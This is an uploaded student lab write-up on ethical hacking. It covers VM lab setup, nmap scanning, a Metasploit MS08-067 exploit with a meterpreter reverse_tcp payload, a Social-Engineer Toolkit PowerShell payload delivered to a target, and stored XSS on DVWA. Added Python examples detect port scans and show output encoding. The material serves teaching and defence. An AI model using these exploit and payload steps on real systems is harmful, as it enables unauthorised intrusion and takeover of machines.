
Ethical Hacking Project Work

This document provides instructions for setting up an ethical hacking lab and demonstrates some basic ethical hacking techniques. It outlines how to: 1. Set up the necessary virtual machines including Kali Linux, Windows, and Metasploitable2. 2. Conduct port scanning and vulnerability scanning of targets to identify open ports and vulnerabilities. 3. Demonstrate system hacking using both passive and active methods, including exploiting the MS08-067 vulnerability and using Metasploit powershell attacks. 4. Demonstrate cross-site scripting attacks on the Damn Vulnerable Web Application using stored XSS to generate a pop-up alert.

Uploaded by

ravi teja

Ethical Hacking Project Work

K Bhanu Prasad
Contents :-
1. Lab setup
2. Scanning of ports and Vulnerability Scanning
3. System Hacking
4. Cross Site Scripting
1. Lab Setup

Step 1 -> Download and install VMware on your PC.
https://www.vmware.com/products/workstation-player/workstation-playerevaluation.html

Step 2 -> Now download the Kali Linux file and open the .vmx file in
VMware on the PC. I got the file from the link below:
https://www.offensive-security.com/kali-linux-vm-vmware-virtualbox-image-download/

Default username:- kali
Default password:- kali
Step 3 -> Now download a Windows XP, 7, etc. ISO file and install it
as a new VMware device on the PC. The file is from the link below:
https://mega.nz/file/vEVimKwJ#qaqBh8vhZ-C7d75qrbQSim8mUxfbd9QWntfDRu8ZSKc

Reference YouTube link:- https://youtu.be/K1rw6iApeBE


Step 4 -> Now download Metasploitable2-Linux and open the .vmx file in
VMware on the PC. The file is from the link below:
sourceforge.net/projects/metasploitable/files/Metasploitable2
This is used as a universal hacking tool and for cross-site scripting.
Default Username = msfadmin
Default Password = msfadmin
2. Scanning of ports and Vulnerability Scanning
Scanning is the process of identifying live systems, services and open
ports that exist on those systems. Steps involved are,
1. Configuring ip
2. Finding the targets
3. Scanning the ports
4. Vulnerability scanning

Step 1:- First check your system IP by using the command “ifconfig”. Mine
is 192.168.64.131.

Step 2:- Find the targets on the network by using the command
netdiscover -r target ip. After executing the command it shows a
Step 3:- My target machine is the one with IP 192.168.64.132. Now scan
the ports by using the command nmap -O target ip.
Step 4:- Now, for scanning the vulnerabilities, use the command
nmap --script vuln target ip
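
Seen from the target's side, the scans in steps 3 and 4 appear as one source touching many ports in a short time. The following is an added example, not part of the original project: a Python detector run over constructed connection-log lines. The log format, window and threshold are assumptions; the addresses are the lab IPs used above.

```python
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(seconds=10)  # assumed sliding window
THRESHOLD = 15                  # assumed: distinct ports per (src, dst) inside WINDOW

def parse(line):
    """Parse one 'ISO-timestamp SRC DST DPORT' line (constructed log format)."""
    ts, src, dst, dport = line.split()
    return datetime.fromisoformat(ts), src, dst, int(dport)

def detect_scans(lines, window=WINDOW, threshold=THRESHOLD):
    """Return {(src, dst): most distinct ports in any window} for pairs at/over threshold."""
    events = defaultdict(list)
    for line in lines:
        if line.strip():
            ts, src, dst, dport = parse(line)
            events[(src, dst)].append((ts, dport))
    alerts = {}
    for pair, evs in events.items():
        evs.sort()
        start, best = 0, 0
        in_window = defaultdict(int)  # port -> hits inside the current window
        for ts, port in evs:
            in_window[port] += 1
            while ts - evs[start][0] > window:  # drop events older than the window
                old = evs[start][1]
                in_window[old] -= 1
                if in_window[old] == 0:
                    del in_window[old]
                start += 1
            best = max(best, len(in_window))
        if best >= threshold:
            alerts[pair] = best
    return alerts

def sample_log():
    """Constructed lab traffic: a burst across 40 ports plus ordinary web requests."""
    t0 = datetime(2024, 1, 1, 12, 0, 0)
    burst = [f"{(t0 + timedelta(milliseconds=50 * i)).isoformat()} "
             f"192.168.64.131 192.168.64.132 {port}"
             for i, port in enumerate(range(20, 60))]
    normal = [f"{(t0 + timedelta(seconds=2 * i)).isoformat()} "
              f"192.168.64.1 192.168.64.132 80" for i in range(30)]
    return burst + normal

if __name__ == "__main__":
    for (src, dst), n in detect_scans(sample_log()).items():
        print(f"possible port scan: {src} -> {dst} ({n} distinct ports in {WINDOW})")
```

A scan spread out so that each probe falls outside the window stays under this threshold, so a real deployment would pair it with a longer-window count.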
3. System Hacking
The process of gaining access to an operating system is known as
system hacking. There are two models for exploiting the vulnerability
of an operating system. They are
1. Passive method
2. Active method
Passive method:-
In this method I am gaining access to the Windows XP machine.
Steps involved are:-
1. In Linux type “msfconsole”; the msf > prompt will appear.
2. Type “search 08-067” (note: this is a vulnerability that is present in
the XP system).
3. Copy the name (path) and type (paste the path)
use exploit/windows/smb/ms08_067_netap
4. A payload has to be injected, hence type “show payloads”. A list of
payloads will appear; select and copy
windows/meterpreter/reverse_tc
5. Type “set payload windows/meterpreter/reverse_tcp”, then
type “show options”.
6. RHOST and LHOST are blank, so I need to assign RHOST (IP address of
target) and LHOST (IP address of attacker machine). Use the set command.
7. Type “exploit”; the payload gets injected into the target and a
meterpreter> prompt is displayed, stating that payload injection is successful.
8. Type “systeminfo” to get the target information.

Active method:-
In passive system hacking, we exploited the operating system without even
touching the system. However, in active system hacking, we need physical
access for a certain amount of time to the operating system or we will have to
use social engineering to make the payload execute at target operating system.

Steps included are:-
1. Type “setoolkit”.
2. Type 1 for Social Engineering Attacks.
3. Type 9 for the PowerShell attack vector, then 1 for the PowerShell
alphanumeric code injector, and select ‘yes’.
4. Enter your IP address and the port 443; Metasploit then starts automatically
and a file will be created in the /root/.set/reports/powershell directory. Share
that file to the target system by any method and open it there (in my case it's
Windows XP).
5. After the above step we can get access to the target, and by using
sessions we can track the actions of the target.
4. Cross Site Scripting
Cross-site scripting (XSS) is a type of computer security vulnerability typically
found in Web applications. XSS enables attackers to inject client-side script into
Web pages viewed by other users. A cross-site scripting vulnerability may be
used by attackers to bypass access controls such as the same origin policy.
For this we are using Damn Vulnerable Web App (DVWA), which is a PHP/MySQL web application
that aims to be an aid for security professionals to test their skills and tools in a legal environment,
to help web developers better understand the processes of securing web applications, and to aid both
students and teachers in learning about web application security in a controlled classroom environment.

Steps involved are:-
1. Start Metasploitable 2 in your VMware.
2. Find out the IP using ifconfig.
3. Now open DVWA in your web browser by typing the IP address of
the Metasploitable 2 machine.
4. Now go to setup and set security to low.
5. Select XSS stored and type as shown in the image, and the
result will be displayed as an alert.
6. Similarly, for more test cases we can perform with different scripts as
Now the result alert is the cookie that is generated while executing the
above script.
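
Step 5 works at low security because the stored input is written back into the page without output encoding, and the alert in step 6 can show the cookie because script is allowed to read it. The following Python example is added here and is not DVWA's code or part of the original project (DVWA itself is PHP); the guestbook rows and session value are constructed, and PHPSESSID is PHP's default session cookie name.

```python
import html
from http.cookies import SimpleCookie

def render_vulnerable(entries):
    """Low-security behaviour: stored values are placed into the page unchanged."""
    return "".join(f"<div>Name: {n}<br>Message: {m}</div>" for n, m in entries)

def render_hardened(entries):
    """Encode on output so stored markup is shown as text instead of being parsed."""
    return "".join(
        f"<div>Name: {html.escape(n)}<br>Message: {html.escape(m)}</div>"
        for n, m in entries)

def session_cookie(value):
    """Build a Set-Cookie value with HttpOnly, so document.cookie cannot read it."""
    jar = SimpleCookie()
    jar["PHPSESSID"] = value          # PHP's default session cookie name
    jar["PHPSESSID"]["httponly"] = True
    jar["PHPSESSID"]["samesite"] = "Lax"
    jar["PHPSESSID"]["path"] = "/"
    return jar["PHPSESSID"].OutputString()

# Constructed guestbook rows as (name, message); the second is a script test string.
SAMPLE = [
    ("alice", "Nice lab!"),
    ("tester", "<script>alert(document.cookie)</script>"),
    ("bob", 'quote " and <b>bold</b> & ampersand'),
]

def executes_script(page):
    """Crude check: does the rendered page contain a live <script> element?"""
    return "<script" in page.lower()

if __name__ == "__main__":
    print("vulnerable page runs script:", executes_script(render_vulnerable(SAMPLE)))
    print("hardened page runs script:  ", executes_script(render_hardened(SAMPLE)))
    print(render_hardened(SAMPLE))
    print("Set-Cookie:", session_cookie("constructed-session-id"))
```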
